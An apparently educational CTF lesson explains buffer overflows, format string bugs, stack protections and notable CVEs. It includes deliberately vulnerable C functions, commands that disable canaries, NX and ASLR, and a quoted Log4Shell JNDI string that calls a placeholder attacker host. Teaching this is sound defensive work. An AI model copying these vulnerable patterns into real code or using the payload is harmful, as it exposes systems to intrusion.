CTF · Lesson 38 · 35 min read

NCL: Exploit Foundations

Buffer overflows, format strings, and the stack — how vulnerabilities work


C gives you direct access to memory. You can read any byte, write any byte, and jump to any address. That power is what makes C fast, dangerous, and the language behind most major operating system kernels.

The cost: if you write past the end of an array, C will not stop you. There is no ArrayIndexOutOfBoundsException. There is no runtime check. The CPU just writes into whatever memory comes next. If that memory happens to hold the address your function returns to, you have just hijacked the program’s control flow.

This is not a theoretical concern. Buffer overflows have been the root cause of the most catastrophic security vulnerabilities in computing history, from the 1988 Morris Worm to the 2021 sudo exploit that gave any local user root access.

This page teaches you how these vulnerabilities work at the memory level. You will trace through the stack byte by byte. The goal is understanding — when you write C, you will know exactly why gets() is banned and why fgets() exists.

Prerequisites: You should understand pointers (Lesson 3.1), stack memory (Lesson 3.5), and arrays/pointer arithmetic (Lesson 3.7).


1. The Stack — Where Your Functions Live

Every time you call a function, the CPU creates a stack frame — a block of memory on the stack that holds everything that function needs. The stack is a region of memory that grows downward (from high addresses toward low addresses).

Here is what the stack looks like when main() calls vuln():

High addresses (top of memory)
┌────────────────────────────┐
│                            │
│   main()'s stack frame     │
│                            │
├────────────────────────────┤
│   Return address           │  ← Address in main() to jump back to
├────────────────────────────┤
│   Saved RBP                │  ← Bookmark to main()'s frame base
├────────────────────────────┤
│                            │
│   vuln()'s local variables │  ← char buffer[64] lives here
│   (buffer, counters, etc.) │
│                            │
├────────────────────────────┤
│   ...                      │
Low addresses (bottom of memory)

Three facts that make exploits possible:

  1. The stack grows down: new frames are placed at lower addresses
  2. Buffers fill up: buffer[0] is at the lowest address, buffer[63] at the highest
  3. The return address sits above the buffer: writing past the buffer’s end moves toward it

The return address is the single most important value on the stack. When a function finishes (return or hits the closing }), the CPU reads the return address and jumps there. If an attacker overwrites it, the CPU jumps wherever the attacker wants.


2. Buffer Overflow — The Classic Vulnerability

Consider this function:

void vuln(void) {
    char buffer[64];
    gets(buffer);       // reads until newline — NO size limit
}

gets() reads characters from standard input into buffer until it encounters a newline. It has no concept of buffer size. It does not know that buffer is only 64 bytes. It just keeps writing.

Here is what memory looks like on x86-64 when vuln() is running:

Address         Contents              What it is
──────────────  ────────────────────  ──────────────────
0x7ffc...0080   0x00000000004011a0    Return address (8 bytes)
0x7ffc...0078   0x00007ffc....00b0    Saved RBP (8 bytes)
0x7ffc...0074   buffer[60] - [63]     ┐
0x7ffc...0070   buffer[56] - [59]     │
...             ...                   │ buffer (64 bytes)
0x7ffc...003c   buffer[4]  - [7]      │
0x7ffc...0038   buffer[0]  - [3]      ┘

Now trace what happens with different input lengths:

64 characters: Characters 0-63 fill buffer[0] through buffer[63]. gets() then appends a null terminator, which lands one byte past the end of the buffer, in the lowest byte of the Saved RBP. An input of 63 characters is the longest that fits with no overflow at all.

72 characters: Characters 0-63 fill buffer. Characters 64-71 overwrite the Saved RBP, and the null terminator clobbers the lowest byte of the return address. The calling function’s frame pointer is corrupted, so the program will likely crash when vuln() returns or when the caller next touches its local variables.

80 characters: Characters 0-63 fill buffer. Characters 64-71 overwrite Saved RBP. Characters 72-79 overwrite the return address. When vuln() returns, the CPU jumps to whatever 8-byte address the attacker placed at positions 72-79.

The math: buffer (64 bytes) + Saved RBP (8 bytes) = 72 bytes to reach the return address on x86-64.

Why gets() is banned

The gets() function was removed from the C standard in C11. Deleting a function from the standard library outright is extremely rare; it happened here because gets() is impossible to use safely. There is no way to tell gets() the size of the buffer.

$ gcc -o vuln vuln.c
/tmp/ccXYZ.o: in function 'vuln':
vuln.c:(.text+0x1a): warning: the 'gets' function is dangerous and should not be used.

GCC will still compile it (with a warning), because old code exists. But the warning is serious.


3. Dangerous C Functions and Their Safe Alternatives

Buffer overflows are not limited to gets(). Several standard library functions write to buffers without checking size:

Dangerous               Safe Alternative                           The Problem
──────────────────────  ─────────────────────────────────────────  ──────────────────────────────────────────────
gets(buf)               fgets(buf, size, stdin)                    No size parameter at all
strcpy(dst, src)        strncpy(dst, src, size)                    Copies until null terminator, no bounds check
strcat(dst, src)        strncat(dst, src, size - strlen(dst) - 1)  Appends until null terminator, no bounds check
sprintf(buf, fmt, ...)  snprintf(buf, size, fmt, ...)              Formats into buffer with no size limit
scanf("%s", buf)        scanf("%63s", buf) or fgets()              Reads until whitespace, no bounds check

The pattern: the dangerous version has no way to specify how many bytes to write. The safe version takes a size parameter.

// DANGEROUS: a line of 64 or more chars overflows buffer
char buffer[64];
gets(buffer);

// SAFE: reads at most 63 chars + null terminator
char buffer[64];
fgets(buffer, sizeof(buffer), stdin);

// DANGEROUS: if src plus its terminator does not fit in dst, buffer overflow
char dst[32];
strcpy(dst, src);

// SAFE: copies at most 31 chars + null terminator
char dst[32];
strncpy(dst, src, sizeof(dst) - 1);
dst[sizeof(dst) - 1] = '\0';  // strncpy doesn't guarantee null termination

Checkpoint: A program uses sprintf(buffer, "Hello, %s!", username) where buffer is 128 bytes. Is this safe?

Only if username is guaranteed to be at most 119 characters long: 128 bytes, minus 7 for “Hello, ”, minus 1 for “!”, minus 1 for the null terminator. If username comes from user input with no length check, this is a buffer overflow. The fix: snprintf(buffer, sizeof(buffer), "Hello, %s!", username). snprintf will truncate the output to fit within the buffer size.


4. Format String Vulnerabilities

printf is one of the most powerful functions in C. It is also one of the most dangerous when used incorrectly.

The correct way to print user input:

printf("%s", user_input);   // user_input is treated as DATA

The dangerous way:

printf(user_input);          // user_input is treated as a FORMAT STRING

When you write printf(user_input), the printf function scans user_input for format specifiers (%x, %s, %d, %n). If the user types Hello, printf prints “Hello” — no problem. But if the user types %x %x %x %x, something very different happens.

What happens with %x

printf expects each %x to have a corresponding argument. You did not pass any, just the format string, but printf has no way to know that. It fetches values from wherever arguments would normally be: on 32-bit x86 that is the stack, and on x86-64 it is a handful of registers first and then the stack. Whatever happens to be there is treated as the arguments:

User types:  %x %x %x %x
printf sees: four %x specifiers, no arguments provided

printf reads 4 values from the stack:
  %x  →  0x7ffc8234   (some stack value)
  %x  →  0x00000040   (some stack value)
  %x  →  0xdeadbeef   (some stack value)
  %x  →  0x00401149   (some stack value — maybe a return address)

Output: 7ffc8234 40 deadbeef 401149

The attacker is reading memory they should not have access to. This leaks stack values, which can include:

  • Return addresses (reveals where code is loaded in memory)
  • Pointers to heap data
  • Local variables from other functions
  • Canary values (see Section 5)

The %n specifier — writing to memory

%n does not print anything. Instead, it writes the number of bytes printed so far into the address pointed to by the corresponding argument. Combined with careful format string construction, an attacker can write arbitrary values to arbitrary memory addresses.

This is why printf(user_input) is a critical vulnerability. It turns a print statement into a read/write primitive for the entire process memory.

The fix is trivial:

printf("%s", user_input);   // user_input can never be interpreted as format specifiers

Checkpoint: A program does fprintf(logfile, user_message) to log user actions. Is this vulnerable?

Yes. fprintf has the same format string behavior as printf. If user_message contains %x or %n, they will be interpreted as format specifiers. The fix: fprintf(logfile, "%s", user_message). This vulnerability is common in logging code because developers think “it is just writing to a file, what could go wrong?”


5. Protection Mechanisms

Modern operating systems and compilers deploy multiple defenses against exploitation. Understanding these matters because CTF challenges often disable specific protections to make the challenge solvable.

Protection    What It Does                                                How to Check
────────────  ──────────────────────────────────────────────────────────  ───────────────────────────────────────
Stack canary  Places a random value between the buffer and the return     checksec binary
              address. Before the function returns, it checks whether
              the canary was modified. If so, the program aborts.
ASLR          Randomizes where the stack, heap, and libraries are         cat /proc/sys/kernel/randomize_va_space
              loaded in memory. Each run uses different addresses, so     (0 = off, 2 = full)
              hardcoded exploit addresses fail.
NX / DEP      Marks the stack as non-executable. Even if an attacker      checksec binary
              injects machine code onto the stack, the CPU refuses to
              execute it.
PIE           Position-Independent Executable. The binary itself loads    checksec binary
              at a random address (not just the stack and libraries).
RELRO         Makes the Global Offset Table (GOT) read-only after the     checksec binary
              program starts. Prevents attackers from overwriting GOT
              entries to redirect function calls.

Stack canaries in detail

Without canary:                    With canary:
┌──────────────┐                   ┌──────────────┐
│ Return addr  │                   │ Return addr  │
├──────────────┤                   ├──────────────┤
│ Saved RBP    │                   │ Saved RBP    │
├──────────────┤                   ├──────────────┤
│              │                   │ CANARY VALUE │ ← random, checked before return
│ buffer[64]   │                   ├──────────────┤
│              │                   │              │
└──────────────┘                   │ buffer[64]   │
                                   │              │
                                   └──────────────┘

An overflow that corrupts the return address must also corrupt the canary (because the canary sits between them). The program detects this and calls __stack_chk_fail, which prints *** stack smashing detected *** and terminates.

To compile without canary protection (for CTF practice):

gcc -fno-stack-protector -o vuln vuln.c

To disable ASLR temporarily (for CTF practice):

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

checksec shows all protections at a glance:

$ checksec --file=vuln
RELRO           STACK CANARY      NX            PIE
Partial RELRO   No canary found   NX enabled    No PIE

6. Notable CVEs — Real Vulnerabilities That Changed the Internet

These are real vulnerabilities. Some use the techniques described in this lesson; others belong to different bug classes and are included for contrast. Each one put a very large number of systems at risk.

CVE-2014-0160 — Heartbleed

A buffer over-read in OpenSSL’s heartbeat extension. The server trusted a length field sent by the client without checking it against the actual data size. The client could claim “I sent 64KB of data” when it only sent 1 byte, and the server would respond with 64KB of its own memory — including private keys, session cookies, and passwords. Affected roughly 17% of all HTTPS servers at disclosure.

CVE-2014-6271 — Shellshock

An environment variable injection in Bash. Bash stored function definitions in environment variables, but its parser continued executing commands after the function definition ended. An attacker could append arbitrary commands after a function definition, and Bash would execute them. Exploitable via CGI web servers, DHCP clients, and any service that passed user input through environment variables.

CVE-2021-3156 — Baron Samedit

A heap-based buffer overflow in sudo, present for nearly 10 years (since 2011). By passing a carefully crafted command line to sudoedit, any local user could overflow a heap buffer and gain root privileges. Working exploits were demonstrated on default installations of several major Linux distributions, including Ubuntu, Debian, and Fedora.

CVE-2016-5195 — Dirty COW

A race condition in the Linux kernel’s copy-on-write (COW) memory management. Two threads racing between a memory write and a page fault could trick the kernel into writing to a read-only memory mapping. This allowed any local user to modify files they could only read — including /etc/passwd — and gain root.

CVE-2021-44228 — Log4Shell

A remote code execution vulnerability in Apache Log4j 2, a widely used Java logging library. Log4j interpreted ${jndi:ldap://attacker.com/exploit} in log messages as an instruction to download and execute code from a remote server. Any application that logged user-controlled input with a vulnerable Log4j version was exposed. Affected hundreds of millions of devices.

CVE-2024-3094 — XZ Backdoor

A supply chain attack on the xz compression library. A maintainer with commit access hid a backdoor in the build scripts shipped with release tarballs and in binary test files, rather than in the readable C source. The build then modified the compiled library so that it could intercept SSH authentication. The backdoor was discovered by accident when a developer noticed sshd logins were about 500ms slower than expected. Because the malicious logic was not in the source files people normally read, ordinary code review did not catch it.

Checkpoint: Which of the CVEs above are buffer overflows or over-reads? Which are not memory-safety bugs at all?

Buffer overflow / over-read: Heartbleed (buffer over-read), Baron Samedit (heap buffer overflow).

Not memory-safety bugs: Shellshock (parser logic error), Dirty COW (race condition in kernel), Log4Shell (injection in Java — a memory-safe language), XZ Backdoor (supply chain — malicious build scripts). Memory safety does not protect against every class of vulnerability.


7. The Ethical Line

Everything on this page describes how vulnerabilities work. Understanding the mechanism is essential for:

  • Defense — You cannot write secure code if you do not understand how insecure code is exploited. Every dangerous function in Section 3 has a safe alternative. You now know why the alternative exists.
  • Competition — CTF and NCL challenges are legal, sandboxed environments designed for practicing these skills.
  • Research — Security researchers find and report vulnerabilities through responsible disclosure, giving vendors time to patch before publishing details.

Unauthorized exploitation of computer systems is a federal crime under the Computer Fraud and Abuse Act (18 U.S.C. 1030). This applies regardless of whether you cause damage. Accessing a system you are not authorized to access is the crime itself. “I was just testing” is not a defense.

The knowledge on this page makes you a better programmer and a better defender. Use it that way.


8. Practice Exercises

All exercises involve analysis and understanding. None require exploiting a running system.

Exercise 1 — Stack frame diagram. Draw the stack frame for this function on x86-64. Label the buffer, saved RBP, and return address. Calculate how many bytes of input overflow the return address.

void target(void) {
    char name[32];
    int count = 0;
    gets(name);
}

Hint: int count occupies 4 bytes. Consider padding — the compiler may align variables to 8-byte boundaries.

Exercise 2 — Spot the vulnerability. Identify the vulnerability class (buffer overflow, format string, or both) in each function:

void func_a(char *input) {
    char buf[100];
    strcpy(buf, input);
}

void func_b(char *input) {
    printf(input);
}

void func_c(char *input) {
    char buf[256];
    snprintf(buf, sizeof(buf), "%s", input);
}

void func_d(char *input) {
    char buf[64];
    sprintf(buf, "User said: %s", input);
}

Exercise 3 — checksec analysis. Compile the same program four different ways and run checksec on each. Record which protections are enabled or disabled:

gcc -o v1 program.c                                         # Default
gcc -fno-stack-protector -o v2 program.c                    # No canary
gcc -fno-stack-protector -z execstack -o v3 program.c       # No canary, executable stack
gcc -fno-stack-protector -z execstack -no-pie -o v4 program.c  # No canary, NX off, no PIE

Exercise 4 — CVE research. Pick one CVE from Section 6. Find the original advisory and a technical writeup. Write a one-paragraph summary explaining: what the vulnerability was, how it was triggered, what the impact was, and how it was fixed. Use your own words.


Resources

Practice: picoCTF (search “buffer overflow”) · pwnable.kr · OverTheWire Narnia (binary exploitation wargame)

Reference: CWE-120: Buffer Copy without Checking Size of Input · CWE-134: Use of Externally-Controlled Format String · checksec.sh

Video: LiveOverflow — Binary Exploitation from scratch · Computerphile — Buffer Overflow Attack